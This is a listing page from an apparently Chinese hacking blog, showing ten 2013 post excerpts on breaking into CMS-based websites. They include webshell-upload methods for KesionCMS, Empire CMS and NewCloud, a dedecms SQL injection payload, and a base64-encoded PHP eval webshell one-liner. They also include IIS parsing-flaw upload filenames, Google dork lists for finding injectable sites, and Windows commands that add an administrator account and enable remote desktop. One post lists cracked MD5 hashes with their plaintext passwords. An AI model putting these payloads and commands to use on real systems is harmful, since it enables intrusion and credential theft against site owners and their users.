• 科讯kesioncms 5.5以下漏洞后台拿shell

    科讯kesioncms 5.5以下漏洞后台拿shell
    科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。 KesionCMS V3.x和3.x以下版本 网上有0day工具不过没有具体原理,下面就讲一下手工拿shell的方法 关键字:in...阅读全文
    作者:qxz_xp | 发布:2013年10月11日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • dedecms(织梦系统)album_add.php sql注入漏洞

    dedecms(织梦系统)album_add.php sql注入漏洞
    dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的 漏洞需要会员,所以比较鸡肋啦 发表文章处,post表单的mtypesid可以注入 /dedecmsnew/member/album_add.php 注入POC: mtypesid=1′),(“‘”,’0′,’1367930810′,’p’,’0′...阅读全文
    作者:qxz_xp | 发布:2013年10月10日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 记一次绕过垃圾防注入系统过程

    记一次绕过垃圾防注入系统过程
    今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接: http://www.xxx.cn/news_list.asp?news_id=1165 目测一般都有漏洞,加个单引号看看,啪地弹出一个框,尿都吓出来了 现在好多的ASP网站由于都存在注入等问题,于是都装备了这种先进的注入系统,所以你一般看到有反注入系统的站后面都是存在...阅读全文
    作者:qxz_xp | 发布:2013年10月10日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • iis7.5加fck解析漏洞后台拿shell

    iis7.5加fck解析漏洞后台拿shell
    IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, http://www.sbmonkey.com/fckeditor/editor/fckeditor.html 上传图片,浏览,上传一个aspx的一句话木马,名字为:a.aspx.a;.a.aspx.jpg..jpg, 上传后直接得到上传地址菜刀连接OK 阅读全文
    作者:qxz_xp | 发布:2013年10月07日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 网站注入大全关键字

    网站注入大全关键字
    inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct.asp?id=随便加个数字  inurl:ManageLogin.asp EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数字) inurl:Article_Print.asp? site 指定网站 inurl:Article_Print.asp? NewsInfo.asp?id= ShowNew.asp?Id= ShowNews.asp?Id= Show.asp?Id= Google dorks sql ...阅读全文
    作者:qxz_xp | 发布:2013年10月06日 | 分类:菜鸟入门, 黑客攻防 | 5条评论
    阅读全文

  • cmd提权部分常用命令

    cmd提权部分常用命令
    CMD部分提权常用命令 ipconfig 显示本地IP地址 net start telnet 开telnet服务 net use z:127.0.0.1c$     映射对方的C盘 net user            查看所有用户列表 net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员 开3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Term...阅读全文
    作者:qxz_xp | 发布:2013年10月01日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 网站注入关键字总结

    网站注入关键字总结
    PHP DORK inurl:(0x3a,version inurl@version,0x3a,databse) inurl:(user,0x3a,pass) inurl:+union+select+ from inurl:+union+select+ pass inurl:+union+select+ SHOP inurl:+union+select+ admin inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= ...阅读全文
    作者:qxz_xp | 发布:2013年10月01日 | 分类:菜鸟入门, 黑客技术 | 4条评论
    阅读全文

  • 帝国cms 6.6后台拿webshell方法

    帝国cms 6.6后台拿webshell方法
    进入后台后点击自定义页面-增加自定义页面-随便写了qxz.php文件名,页面内容填写,<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script> 如果内容直接添一句话或者php大马是没有用的,,因为他会生成qxz.php前先给你执行!! PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST[‘cmd&#...阅读全文
    作者:qxz_xp | 发布:2013年9月27日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
    阅读全文

  • 收集的一些破解过的MD5密文

    收集的一些破解过的MD5密文
    d7c48f4093825b04        ming123 7333be214e2c7808        123,!! d9966c834441d3a1        huxiadmin 3b3516e7efa7015a        fjjjzx2008 ce9f21a791429e49        dai_6407 d7932f6e0545e6b3        hj12310402!(*! e5e8fa1cf88b768a        194523102872 8c17e425c5506b7c        894370988@qq.com 369c820820a1a5f4        wangchanglei11 7f403dfbdc2a11d8        ad...阅读全文
    作者:qxz_xp | 发布:2013年9月26日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 新云网站管理系统后台拿shell

    新云网站管理系统后台拿shell
    影响范围:全ACCESS版本,SQL未测试。 新云网站管理系统是现在比较流行的cms系统,功能也算强大,但由于ASP语言本身的安全环境不是很好,所以漏洞多多也不新鲜,我这里一共发现了两个安全隐患,应该说是致命的。   一、COOKIES欺骗,进入后台。 大家都知道,一般的后台密码都是MD5加密的,如果管理员把密码设置的复杂一点,即使你在聪明,恐怕也要用个一年半载才能破解出来...阅读全文
    作者:qxz_xp | 发布:2013年8月28日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文